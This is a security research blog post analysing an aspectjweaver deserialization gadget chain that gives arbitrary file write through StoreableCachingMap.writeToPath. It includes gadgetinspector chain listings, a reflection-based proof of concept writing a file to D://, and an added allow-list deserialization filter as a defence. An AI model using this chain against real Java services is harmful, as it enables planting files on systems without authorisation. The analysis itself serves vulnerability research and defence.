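Some findings on the aspectjweaver file write

Notes on findings from a recent analysis of the gadget chain in the aspectjweaver Java component

Environment used
Windows
Java 1.8.0_291
aspectjweaver 1.9.21

Dependencies used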

<dependencies>
    <dependency>
        <groupId>commons-collections</groupId>
        <artifactId>commons-collections</artifactId>
        <version>3.2.2</version>
    </dependency>
    <!-- https://mvnrepository.com/artifact/org.aspectj/aspectjweaver -->
    <dependency>
        <groupId>org.aspectj</groupId>
        <artifactId>aspectjweaver</artifactId>
        <version>1.9.21</version>
        <scope>runtime</scope>
    </dependency>
</dependencies>

Running the gadgetinspector tool yields the following chains
org/apache/log4j/spi/LoggingEvent.readObject(Ljava/io/ObjectInputStream;)V (1)
org/apache/log4j/spi/LoggingEvent.readLevel(Ljava/io/ObjectInputStream;)V (1)
java/lang/reflect/Method.invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object; (0)

com/sun/corba/se/spi/orbutil/proxy/CompositeInvocationHandlerImpl.invoke(Ljava/lang/Object;Ljava/lang/reflect/Method;[Ljava/lang/Object;)Ljava/lang/Object; (0)
org/aspectj/weaver/tools/cache/SimpleCache$StoreableCachingMap.get(Ljava/lang/Object;)Ljava/lang/Object; (0)
org/aspectj/weaver/tools/cache/SimpleCache$StoreableCachingMap.readFromPath(Ljava/lang/String;)[B (1)
java/io/FileInputStream.<init>(Ljava/lang/String;)V (1)

java/security/cert/CertificateRevokedException.readObject(Ljava/io/ObjectInputStream;)V (1)
org/aspectj/weaver/tools/cache/SimpleCache$StoreableCachingMap.put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object; (1)
org/aspectj/weaver/tools/cache/SimpleCache$StoreableCachingMap.storeMap()V (0)
java/io/FileOutputStream.<init>(Ljava/io/File;)V (1)

java/security/cert/CertificateRevokedException.readObject(Ljava/io/ObjectInputStream;)V (1)
java/util/Collections$CheckedMap.put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object; (1)
org/aspectj/weaver/tools/cache/SimpleCache$StoreableCachingMap.put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object; (0)
org/aspectj/weaver/tools/cache/SimpleCache$StoreableCachingMap.writeToPath(Ljava/lang/String;[B)Ljava/lang/String; (0)
java/io/FileOutputStream.<init>(Ljava/lang/String;)V (1)

org/apache/log4j/pattern/LogEvent.readObject(Ljava/io/ObjectInputStream;)V (1)
org/apache/log4j/pattern/LogEvent.readLevel(Ljava/io/ObjectInputStream;)V (1)
java/lang/reflect/Method.invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object; (0)

java/security/cert/CertificateRevokedException.readObject(Ljava/io/ObjectInputStream;)V (1)
org/aspectj/weaver/tools/cache/SimpleCache$StoreableCachingMap.put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object; (1)
org/aspectj/weaver/tools/cache/SimpleCache$StoreableCachingMap.writeToPath(Ljava/lang/String;[B)Ljava/lang/String; (1)
java/io/FileOutputStream.<init>(Ljava/lang/String;)V (1)

The chain actually used
org/aspectj/weaver/tools/cache/SimpleCache$StoreableCachingMap.writeToPath(Ljava/lang/String;[B)Ljava/lang/String; (1)

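This leads to SimpleCache -> StoreableCachingMap

It overrides the put method

Next, look at how the writeToPath method is implemented

This suggests a flaw that can be exploited: the key corresponds to D://, the value corresponds to 1.txt, followed by the actual content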
public Object put(Object key, Object value) {

The exploitation is then carried out as follows:
1. Load the class "org.aspectj.weaver.tools.cache.SimpleCache$StoreableCachingMap" via reflection
2. Make the private member accessible: con.setAccessible(true);
3. Instantiate the object: HashMap map = (HashMap)con.newInstance("D://", 1);
4. Finally call its put method: Object value=map.put("1.txt","111".getBytes(StandardCharsets.UTF_8));

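import java.lang.reflect.Constructor;
import java.nio.charset.StandardCharsets;
import java.util.HashMap;

// The constructor is not publicly accessible, so it is obtained through reflection
Constructor<?> con = Class.forName("org.aspectj.weaver.tools.cache.SimpleCache$StoreableCachingMap").getDeclaredConstructor(String.class, int.class);
con.setAccessible(true);
HashMap map = (HashMap) con.newInstance("D://", 1);
Object value = map.put("1.txt", "111".getBytes(StandardCharsets.UTF_8));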

This completes the file write
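
A defensive counterpart to the chains listed above, added here as an example (not code from the original post): a look-ahead ObjectInputStream that checks each class name against an allow-list before resolving it, so a serialized StoreableCachingMap is rejected before its put() can reach writeToPath. The names LookAheadDemo and AllowListStream and the one-entry allow-list are assumptions for illustration; it expects aspectjweaver 1.9.21 on the classpath, as in the dependencies above.

```java
import java.io.*;
import java.lang.reflect.Constructor;
import java.nio.file.Files;
import java.util.*;

public class LookAheadDemo {
    // Assumption: the application only ever expects these types on the wire.
    static final Set<String> ALLOWED = new HashSet<>(Arrays.asList("java.util.ArrayList"));

    // Look-ahead stream: the class name is checked before the class is resolved,
    // so neither readObject() nor StoreableCachingMap.put() can run for a rejected type.
    static class AllowListStream extends ObjectInputStream {
        AllowListStream(InputStream in) throws IOException { super(in); }
        @Override
        protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
            if (!ALLOWED.contains(desc.getName())) {
                throw new InvalidClassException(desc.getName(), "not on deserialization allow-list");
            }
            return super.resolveClass(desc);
        }
    }

    static Object readFiltered(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new AllowListStream(new ByteArrayInputStream(data))) {
            return in.readObject();
        }
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bos)) { out.writeObject(o); }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample: an empty StoreableCachingMap bound to a temp directory; put() is never called.
        Constructor<?> con = Class.forName(
                "org.aspectj.weaver.tools.cache.SimpleCache$StoreableCachingMap")
                .getDeclaredConstructor(String.class, int.class);
        con.setAccessible(true);
        Object map = con.newInstance(Files.createTempDirectory("demo").toString(), 1);
        System.out.println(readFiltered(serialize(new ArrayList<>(Arrays.asList("ok")))));
        try {
            readFiltered(serialize(map));
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```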

posted @ 2024-01-02 11:04  kr0x02